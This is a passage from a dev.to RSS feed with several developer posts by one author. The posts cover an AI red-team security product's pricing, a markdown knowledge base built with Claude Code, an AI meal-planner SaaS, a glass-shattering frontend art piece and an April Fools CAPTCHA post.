&lt;strong&gt;OWASP Top 10&lt;/strong&gt; — map findings to OWASP categories&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;PCI DSS 4.0&lt;/strong&gt; — payment card security compliance&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;SOC 2 Type II&lt;/strong&gt; — service organization controls&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;HIPAA&lt;/strong&gt; — healthcare data protection&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Each report includes executive summary, detailed findings, remediation roadmap, and compliance mapping.&lt;/p&gt;

&lt;h2&gt;
  
  
  What I Learned Building This
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;1. AI tool-use is perfect for security testing&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The AI naturally thinks in attack chains: "I found a missing header, so let me check for injection. I found injection, so let me check what database is behind it." This is exactly how human pentesters think — but the AI does it in minutes, not weeks.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. Graph databases are essential for attack path analysis&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;SQL can't efficiently answer "can an attacker reach asset Z from asset A through any path?" Graph traversal handles this natively with BFS/DFS.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. Probabilistic simulation beats static scoring&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;CVSS alone is useless for decision-making. "This vulnerability has a 7.5 CVSS" means nothing to a CISO. But "there's a 70% chance an attacker reaches your customer database through this vulnerability" — that gets budget approved.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;4. The mid-market is massively underserved&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Enterprise security tools cost $50K-$200K+ per year. 90% of companies can't afford that. We deliver the same capabilities at $499-$2,999/mo. The AI Red Team alone replaces a $20K pentest engagement — and you can run it unlimited.&lt;/p&gt;

&lt;h2&gt;
  
  
  Pricing
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Plan&lt;/th&gt;
&lt;th&gt;Price&lt;/th&gt;
&lt;th&gt;Assets&lt;/th&gt;
&lt;th&gt;Best For&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Starter&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;$499/mo&lt;/td&gt;
&lt;td&gt;25&lt;/td&gt;
&lt;td&gt;Small teams&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Professional&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;$1,499/mo&lt;/td&gt;
&lt;td&gt;200&lt;/td&gt;
&lt;td&gt;Mid-market&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Enterprise&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;$2,999/mo&lt;/td&gt;
&lt;td&gt;Unlimited&lt;/td&gt;
&lt;td&gt;Large organizations&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;14-day free trial. No credit card required.&lt;/p&gt;

&lt;h2&gt;
  
  
  Try It
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://shieldgraph.com" rel="noopener noreferrer"&gt;shieldgraph.com&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The AI Red Team alone would cost $20K+ from a consulting firm. We give it to you on-demand, unlimited, for a fraction of the cost.&lt;/p&gt;

&lt;p&gt;We just launched on Product Hunt — I'd love feedback from the dev community. What features would you want to see next?&lt;/p&gt;

&lt;p&gt;Drop a comment below or reach out on &lt;a href="https://twitter.com/shieldgraph" rel="noopener noreferrer"&gt;Twitter @shieldgraph&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>ai</category>
      <category>cybersecurity</category>
      <category>security</category>
      <category>webdev</category>
    </item>
    <item>
      <title>I Built a Personal Second Brain with Markdown Files and Claude Code — Here's How</title>
      <dc:creator>Ranjith Kumar Kondoju</dc:creator>
      <pubDate>Wed, 08 Apr 2026 01:17:23 +0000</pubDate>
      <link>https://dev.to/rkondoju/i-built-a-personal-second-brain-with-markdown-files-and-claude-code-heres-how-2m14</link>
      <guid>https://dev.to/rkondoju/i-built-a-personal-second-brain-with-markdown-files-and-claude-code-heres-how-2m14</guid>
      <description>&lt;h2&gt;
  
  
  The Inspiration
&lt;/h2&gt;

&lt;p&gt;I saw &lt;a href="https://x.com/karpathy" rel="noopener noreferrer"&gt;Andrej Karpathy's viral post&lt;/a&gt; about using LLMs to build personal knowledge bases — no vector database, no chunking pipeline. Just markdown files, Obsidian, and Claude Code.&lt;/p&gt;

&lt;p&gt;The core idea blew my mind:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Create a folder with &lt;code&gt;raw/&lt;/code&gt; and &lt;code&gt;wiki/&lt;/code&gt; subfolders&lt;/li&gt;
&lt;li&gt;Drop in source documents, articles, transcripts&lt;/li&gt;
&lt;li&gt;Tell the LLM to ingest the raw files and build wiki pages with relationships, tags, and backlinks&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;I immediately thought: &lt;strong&gt;I need to build this, but better.&lt;/strong&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  What I Built
&lt;/h2&gt;

&lt;p&gt;I took Karpathy's concept and extended it into a full-featured &lt;strong&gt;Personal Second Brain&lt;/strong&gt; with several improvements:&lt;/p&gt;

&lt;h3&gt;
  
  
  The Original Concept (Credit: Andrej Karpathy)
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Markdown-based wiki with &lt;code&gt;raw/&lt;/code&gt; → &lt;code&gt;wiki/&lt;/code&gt; pipeline&lt;/li&gt;
&lt;li&gt;LLM reads source material and generates structured wiki pages&lt;/li&gt;
&lt;li&gt;Pages link to each other via &lt;code&gt;[[backlinks]]&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Graph view in Obsidian shows connections&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  My Improvements
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;1. Multi-Format Ingestion&lt;/strong&gt;&lt;br&gt;
The original handles text/markdown. I added support for:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;PDF files&lt;/strong&gt; → converted via Marker to markdown before processing&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;YouTube transcripts&lt;/strong&gt; → auto-fetched and ingested&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Web articles&lt;/strong&gt; → fetched and cleaned automatically&lt;/li&gt;
&lt;li&gt;Any text-based format&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;2. Smart Duplicate Detection&lt;/strong&gt;&lt;br&gt;
Before creating a new wiki page, the system checks if a similar topic already exists. If so, it &lt;strong&gt;merges&lt;/strong&gt; the new information instead of creating duplicates.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. Auto-Generated Index&lt;/strong&gt;&lt;br&gt;
A master &lt;code&gt;_Index.md&lt;/code&gt; file is automatically maintained with:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Categorized links to all wiki pages&lt;/li&gt;
&lt;li&gt;Quick-reference descriptions&lt;/li&gt;
&lt;li&gt;Last-updated timestamps&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;4. Relationship Mapping&lt;/strong&gt;&lt;br&gt;
Every wiki page includes:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;related_topics&lt;/code&gt; in frontmatter&lt;/li&gt;
&lt;li&gt;Inline &lt;code&gt;[[backlinks]]&lt;/code&gt; to connected concepts&lt;/li&gt;
&lt;li&gt;Tags for cross-cutting themes&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;5. Source Tracking&lt;/strong&gt;&lt;br&gt;
Each wiki page tracks which raw file(s) it was generated from, so you can always trace back to the original source.&lt;/p&gt;


&lt;h2&gt;
  
  
  Project Structure
&lt;/h2&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;knowledge-base/
├── raw/                    # Drop files here
│   ├── articles/
│   ├── transcripts/
│   ├── notes/
│   └── pdfs/
├── wiki/                   # Auto-generated wiki pages
│   ├── _Index.md           # Master index
│   ├── concept-name.md     # Individual pages
│   └── ...
├── .claude/
│   └── commands/
│       └── ingest.md       # The ingestion prompt
└── CLAUDE.md               # Project instructions
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  How the Ingestion Works
&lt;/h2&gt;

&lt;p&gt;The magic is in the ingestion prompt. When you run it, Claude Code:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Scans&lt;/strong&gt; &lt;code&gt;raw/&lt;/code&gt; for new/modified files&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Reads&lt;/strong&gt; each file and extracts key concepts, entities, and relationships&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Checks&lt;/strong&gt; existing wiki pages for overlap&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Creates or updates&lt;/strong&gt; wiki pages with proper frontmatter, backlinks, and tags&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Updates&lt;/strong&gt; the master index&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Here's what a generated wiki page looks like:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight markdown"&gt;&lt;code&gt;&lt;span class="nn"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;title&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Transformer Architecture&lt;/span&gt;
&lt;span class="na"&gt;tags&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;deep-learning&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;nlp&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;attention&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
&lt;span class="na"&gt;source&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;raw/articles/attention-is-all-you-need.md&lt;/span&gt;
&lt;span class="na"&gt;related_topics&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[[&lt;/span&gt;&lt;span class="nv"&gt;Self-Attention&lt;/span&gt;&lt;span class="pi"&gt;]]&lt;/span&gt;&lt;span class="err"&gt;,&lt;/span&gt; &lt;span class="pi"&gt;[[&lt;/span&gt;&lt;span class="nv"&gt;BERT&lt;/span&gt;&lt;span class="pi"&gt;]]&lt;/span&gt;&lt;span class="err"&gt;,&lt;/span&gt; &lt;span class="pi"&gt;[[&lt;/span&gt;&lt;span class="nv"&gt;GPT&lt;/span&gt;&lt;span class="pi"&gt;]]&lt;/span&gt;
&lt;span class="na"&gt;created&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;2026-04-07&lt;/span&gt;
&lt;span class="nn"&gt;---&lt;/span&gt;

&lt;span class="gh"&gt;# Transformer Architecture&lt;/span&gt;

The transformer is a neural network architecture that relies 
entirely on self-attention mechanisms...

&lt;span class="gu"&gt;## Key Concepts&lt;/span&gt;
&lt;span class="p"&gt;-&lt;/span&gt; &lt;span class="gs"&gt;**Self-Attention**&lt;/span&gt; — see [[Self-Attention]]
&lt;span class="p"&gt;-&lt;/span&gt; &lt;span class="gs"&gt;**Multi-Head Attention**&lt;/span&gt; — parallel attention layers
&lt;span class="p"&gt;-&lt;/span&gt; &lt;span class="gs"&gt;**Positional Encoding**&lt;/span&gt; — since transformers have no recurrence

&lt;span class="gu"&gt;## Related&lt;/span&gt;
&lt;span class="p"&gt;-&lt;/span&gt; [[BERT]] — encoder-only transformer
&lt;span class="p"&gt;-&lt;/span&gt; [[GPT]] — decoder-only transformer
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  The Results
&lt;/h2&gt;

&lt;p&gt;After ingesting ~50 files:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;44 interconnected wiki pages&lt;/strong&gt; generated automatically&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Graph view&lt;/strong&gt; in Obsidian shows meaningful clusters&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Token savings&lt;/strong&gt;: ~90% reduction vs. feeding raw files to an LLM&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Retrieval&lt;/strong&gt;: follows index → links instead of similarity search, so relationships are &lt;em&gt;meaningful&lt;/em&gt;, not just "these chunks seem similar"&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Try It Yourself
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Prerequisites
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://claude.ai/code" rel="noopener noreferrer"&gt;Claude Code&lt;/a&gt; (CLI)&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://obsidian.md" rel="noopener noreferrer"&gt;Obsidian&lt;/a&gt; (for viewing)&lt;/li&gt;
&lt;li&gt;A folder of documents you want to organize&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Quick Start
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;mkdir&lt;/span&gt; &lt;span class="nt"&gt;-p&lt;/span&gt; ~/knowledge-base/&lt;span class="o"&gt;{&lt;/span&gt;raw,wiki&lt;span class="o"&gt;}&lt;/span&gt;
&lt;span class="nb"&gt;cd&lt;/span&gt; ~/knowledge-base

&lt;span class="c"&gt;# Drop your files into raw/&lt;/span&gt;
&lt;span class="nb"&gt;cp&lt;/span&gt; ~/Documents/interesting-article.md raw/

&lt;span class="c"&gt;# Start Claude Code and ingest&lt;/span&gt;
claude
&lt;span class="c"&gt;# Then type: "Ingest all files in raw/ and create wiki pages in wiki/"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  Key Takeaway
&lt;/h2&gt;

&lt;p&gt;You don't need a vector database, embeddings pipeline, or RAG infrastructure to give AI persistent, organized memory. &lt;strong&gt;A folder of markdown files gets you surprisingly far.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The real insight from Karpathy's approach: let the LLM do what it's good at — &lt;em&gt;reading, understanding, and organizing&lt;/em&gt; — while you use simple, human-readable files as the storage layer.&lt;/p&gt;




&lt;h2&gt;
  
  
  Credits
&lt;/h2&gt;

&lt;p&gt;Full credit to &lt;strong&gt;Andrej Karpathy&lt;/strong&gt; for the original concept and inspiration. His viral post about LLM-powered knowledge bases sparked this project. I've simply extended the idea with multi-format support, duplicate detection, and automated indexing.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Have questions or built something similar? Drop a comment below!&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>productivity</category>
      <category>knowledgebase</category>
      <category>claudecode</category>
    </item>
    <item>
      <title>I Built an AI Meal Planner That Saves Families $200/Month on Groceries</title>
      <dc:creator>Ranjith Kumar Kondoju</dc:creator>
      <pubDate>Tue, 07 Apr 2026 03:54:46 +0000</pubDate>
      <link>https://dev.to/rkondoju/i-built-an-ai-meal-planner-that-saves-families-200month-on-groceries-34m8</link>
      <guid>https://dev.to/rkondoju/i-built-an-ai-meal-planner-that-saves-families-200month-on-groceries-34m8</guid>
      <description>&lt;p&gt;Every Sunday my family had the same conversation:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;"What should we cook this week?"&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;30 minutes of arguing later, we'd end up ordering takeout. Again. $60 gone. Again.&lt;/p&gt;

&lt;p&gt;I got tired of it, so I built &lt;strong&gt;MealAI&lt;/strong&gt; — an AI-powered meal planner that generates a full week of meals in seconds and creates a smart grocery list you can order with one tap.&lt;/p&gt;

&lt;p&gt;Here's how I built it and what I learned.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Problem
&lt;/h2&gt;

&lt;p&gt;Meal planning is broken for most families:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;It takes &lt;strong&gt;30-60 minutes&lt;/strong&gt; every week to plan meals&lt;/li&gt;
&lt;li&gt;You forget ingredients and make multiple grocery trips&lt;/li&gt;
&lt;li&gt;You overspend because you buy without a plan&lt;/li&gt;
&lt;li&gt;Everyone in the family has different dietary needs&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;I wanted something that could handle all of this in under 30 seconds.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Tech Stack
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Framework:&lt;/strong&gt; Next.js (App Router)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;AI:&lt;/strong&gt; Claude API (Anthropic)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Database:&lt;/strong&gt; Supabase (PostgreSQL + Auth)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Payments:&lt;/strong&gt; Stripe&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Hosting:&lt;/strong&gt; Vercel&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Styling:&lt;/strong&gt; Tailwind CSS&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Why These Choices?
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Next.js App Router&lt;/strong&gt; — Server components for fast initial loads. API routes that scale to zero on Vercel. The file-based routing made it easy to add new pages fast.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Claude AI over GPT&lt;/strong&gt; — I tested both extensively. Claude produces more structured, consistent meal plan outputs. When you ask for a 7-day meal plan with macros, calorie counts, and ingredient quantities, Claude rarely hallucinates numbers. GPT-4 would sometimes give you a 1200-calorie "meal" that was actually 800.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Supabase&lt;/strong&gt; — PostgreSQL with built-in auth, row-level security, and a generous free tier. Perfect for a bootstrapped SaaS. The RLS policies mean I never worry about users accessing each other's data.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Vercel&lt;/strong&gt; — Deploy on push. Edge functions. Free SSL. No DevOps needed.&lt;/p&gt;

&lt;h2&gt;
  
  
  How the AI Meal Planning Works
&lt;/h2&gt;

&lt;p&gt;The core flow is simple:&lt;/p&gt;

&lt;p&gt;User Preferences --&amp;gt; Prompt Engineering --&amp;gt; Claude API --&amp;gt; Structured JSON --&amp;gt; Database&lt;/p&gt;

&lt;p&gt;The user sets their profile once:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Dietary preference (keto, vegan, vegetarian, Mediterranean, etc.)&lt;/li&gt;
&lt;li&gt;Allergies and restrictions&lt;/li&gt;
&lt;li&gt;Family size and per-member preferences&lt;/li&gt;
&lt;li&gt;Weekly grocery budget&lt;/li&gt;
&lt;li&gt;Preferred cuisines (14 options from Indian to Korean)&lt;/li&gt;
&lt;li&gt;Health goals (weight loss, muscle gain, etc.)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Then I construct a detailed prompt that includes all of this context and ask Claude to generate a 7-day meal plan as structured JSON.&lt;/p&gt;

&lt;p&gt;The key insight: &lt;strong&gt;prompt engineering is 90% of the product quality.&lt;/strong&gt; I spent more time refining the prompt than writing the UI. Small changes like "ensure each day totals within 50 calories of the target" dramatically improved output consistency.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Smart Grocery List
&lt;/h2&gt;

&lt;p&gt;This is where MealAI goes beyond a simple AI wrapper.&lt;/p&gt;

&lt;p&gt;The AI generates meals with specific ingredients and quantities. I aggregate these across all 21+ meals in the week, combine duplicates (you don't need 7 separate "1 onion" entries), and sort by grocery aisle.&lt;/p&gt;

&lt;p&gt;Then users can order everything on &lt;strong&gt;Instacart&lt;/strong&gt;, &lt;strong&gt;Walmart&lt;/strong&gt;, or &lt;strong&gt;Amazon&lt;/strong&gt; with one tap.&lt;/p&gt;

&lt;h2&gt;
  
  
  Security: What I Wish I Knew Before Launch
&lt;/h2&gt;

&lt;p&gt;When I first deployed, I had zero security beyond Supabase auth. Here's what I added before going live:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Rate Limiting&lt;/strong&gt; — Sliding window rate limiter on all API routes. The AI generation endpoint gets 5 requests/minute. Without this, one user could burn through your entire Claude API budget.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Input Validation&lt;/strong&gt; — Every user input gets validated server-side. Age must be 1-150. Weight must be 10-500kg. HTML tags get stripped from all text inputs.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Field Whitelisting&lt;/strong&gt; — API update endpoints only accept specific fields. Without this, a malicious user could send a modified stripe_customer_id and steal another user's subscription.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Security Headers&lt;/strong&gt; — CSP, HSTS, X-Frame-Options, Referrer-Policy via next.config.ts.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The lesson:&lt;/strong&gt; Security isn't a feature you add later. Build it from day one.&lt;/p&gt;

&lt;h2&gt;
  
  
  Monetization Strategy
&lt;/h2&gt;

&lt;p&gt;MealAI uses a freemium model:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Free tier&lt;/strong&gt; — Limited meal plan generations per month&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Pro ($4.99/mo)&lt;/strong&gt; — Unlimited plans, family profiles, advanced health features&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Plus affiliate revenue from grocery delivery links. When a user orders groceries through our Instacart or Amazon links, we earn a commission.&lt;/p&gt;

&lt;h2&gt;
  
  
  Lessons Learned
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;1. Solve your own problem first&lt;/strong&gt;&lt;br&gt;
I built MealAI because my family needed it. That meant I was my own first user and could feel every pain point.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. AI output quality &amp;gt; UI polish&lt;/strong&gt;&lt;br&gt;
Users forgive an ugly button. They don't forgive a meal plan that suggests "chicken breast salad" for every single lunch. Spend time on your prompts.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. Vercel's serverless has gotchas&lt;/strong&gt;&lt;br&gt;
In-memory state doesn't persist between function invocations. I initially built an in-memory analytics logger that worked perfectly locally but lost all data in production. Had to migrate to Supabase-backed persistence.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;4. Ship fast, secure early&lt;/strong&gt;&lt;br&gt;
I launched with basic auth and added security hardening before announcing publicly. Don't wait until you have users to add rate limiting.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;5. Affiliate programs are harder than you think&lt;/strong&gt;&lt;br&gt;
Many affiliate networks reject new sites with low traffic. Apply early, get rejected, reapply later. Start with programs that have lower barriers like Amazon Associates.&lt;/p&gt;

&lt;h2&gt;
  
  
  What's Next
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Email notifications for weekly meal plan reminders&lt;/li&gt;
&lt;li&gt;Recipe sharing between users&lt;/li&gt;
&lt;li&gt;Instacart deep linking with affiliate tracking&lt;/li&gt;
&lt;li&gt;Mobile app (React Native)&lt;/li&gt;
&lt;li&gt;Multi-language support&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Try It Out
&lt;/h2&gt;

&lt;p&gt;MealAI is live at &lt;strong&gt;&lt;a href="https://usemealai.com" rel="noopener noreferrer"&gt;usemealai.com&lt;/a&gt;&lt;/strong&gt;. Free to use — just sign in with Google and generate your first meal plan in 30 seconds.&lt;/p&gt;

&lt;p&gt;I'd love your feedback. What features would make this useful for your family?&lt;/p&gt;




&lt;p&gt;&lt;em&gt;If you found this useful, follow me for more posts about building AI-powered SaaS products as a solo developer.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>webdev</category>
      <category>nextjs</category>
      <category>startup</category>
    </item>
    <item>
      <title>Breaking the Glass Ceiling — An Interactive Frontend Art Piece</title>
      <dc:creator>Ranjith Kumar Kondoju</dc:creator>
      <pubDate>Sat, 04 Apr 2026 14:46:01 +0000</pubDate>
      <link>https://dev.to/shirisha_uppoju_b20d30705/breaking-the-glass-ceiling-an-interactive-frontend-art-piece-2bpd</link>
      <guid>https://dev.to/shirisha_uppoju_b20d30705/breaking-the-glass-ceiling-an-interactive-frontend-art-piece-2bpd</guid>
      <description>&lt;p&gt;&lt;em&gt;This is a submission for the &lt;a href="https://dev.to/challenges/wecoded-2026"&gt;DEV WeCoded 2026 Challenge&lt;/a&gt;: Frontend Art&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  What I Built
&lt;/h2&gt;

&lt;p&gt;An interactive glass-shattering visualization that lets you literally break the glass ceiling. Click the glass — watch it crack, splinter, and fall away with realistic physics. Behind each shattered piece, a pioneer is revealed.&lt;/p&gt;

&lt;p&gt;Six women who built the foundations of modern tech:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;👩‍💻 &lt;strong&gt;Ada Lovelace&lt;/strong&gt; — First Computer Programmer (1843)&lt;/li&gt;
&lt;li&gt;⚓ &lt;strong&gt;Grace Hopper&lt;/strong&gt; — Invented the First Compiler (1952)&lt;/li&gt;
&lt;li&gt;🚀 &lt;strong&gt;Katherine Johnson&lt;/strong&gt; — NASA's Hidden Figure (1962)&lt;/li&gt;
&lt;li&gt;💻 &lt;strong&gt;Margaret Hamilton&lt;/strong&gt; — Apollo Software Engineering (1969)&lt;/li&gt;
&lt;li&gt;🌐 &lt;strong&gt;Radia Perlman&lt;/strong&gt; — Mother of the Internet (1985)&lt;/li&gt;
&lt;li&gt;📱 &lt;strong&gt;Megan Smith&lt;/strong&gt; — Former U.S. CTO &amp;amp; VP at Google (2014)&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Demo
&lt;/h2&gt;

&lt;p&gt;🔗 &lt;strong&gt;&lt;a href="https://shopsmartai.github.io/breaking-the-glass-ceiling/" rel="noopener noreferrer"&gt;Try it live → Breaking the Glass Ceiling&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  How I Built It
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;HTML5 Canvas&lt;/strong&gt; — Glass grid with Voronoi-style shard generation and irregular triangulation&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Physics Engine&lt;/strong&gt; — Custom gravity, velocity, and rotation for each falling shard&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Web Audio API&lt;/strong&gt; — Procedurally generated crack sound effects in real-time&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Particle System&lt;/strong&gt; — Sparkle effects with decay and gravity&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;CSS Animations&lt;/strong&gt; — Pioneer card reveals and staggered final message sequence&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Zero dependencies. Pure vanilla JavaScript, CSS, and HTML.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Message
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;The ceiling was never real. The talent always was.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;27% of the computing workforce is women. 5% of tech startup founders are women. But the potential when barriers are removed? &lt;strong&gt;Infinite.&lt;/strong&gt;&lt;/p&gt;


&lt;div class="ltag-github-readme-tag"&gt;
  &lt;div class="readme-overview"&gt;
    &lt;h2&gt;
      &lt;img src="https://assets.dev.to/assets/github-logo-5a155e1f9a670af7944dd5e12375bc76ed542ea80224905ecaf878b9157cdefc.svg" alt="GitHub logo"&gt;
      &lt;a href="https://github.com/shopsmartai" rel="noopener noreferrer"&gt;
        shopsmartai
      &lt;/a&gt; / &lt;a href="https://github.com/shopsmartai/breaking-the-glass-ceiling" rel="noopener noreferrer"&gt;
        breaking-the-glass-ceiling
      &lt;/a&gt;
    &lt;/h2&gt;
    &lt;h3&gt;
      An interactive glass-shattering frontend art piece celebrating women pioneers in tech. Built for WeCoded 2026 Challenge.
    &lt;/h3&gt;
  &lt;/div&gt;
&lt;/div&gt;


</description>
      <category>devchallenge</category>
      <category>wecoded</category>
      <category>frontend</category>
      <category>showdev</category>
    </item>
    <item>
      <title>CAPTCHA for Robots: A Verification System That Humans Will Never Pass</title>
      <dc:creator>Ranjith Kumar Kondoju</dc:creator>
      <pubDate>Thu, 02 Apr 2026 23:31:04 +0000</pubDate>
      <link>https://dev.to/shirisha_uppoju_b20d30705/captcha-for-robots-a-verification-system-that-humans-will-never-pass-32n4</link>
      <guid>https://dev.to/shirisha_uppoju_b20d30705/captcha-for-robots-a-verification-system-that-humans-will-never-pass-32n4</guid>
      <description>&lt;p&gt;&lt;em&gt;This is a submission for the &lt;a href="https://dev.to/challenges/aprilfools-2026"&gt;DEV April Fools Challenge&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  What I Built
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;CAPTCHA for Robots&lt;/strong&gt; — Because why should humans have all the verification fun?&lt;/p&gt;

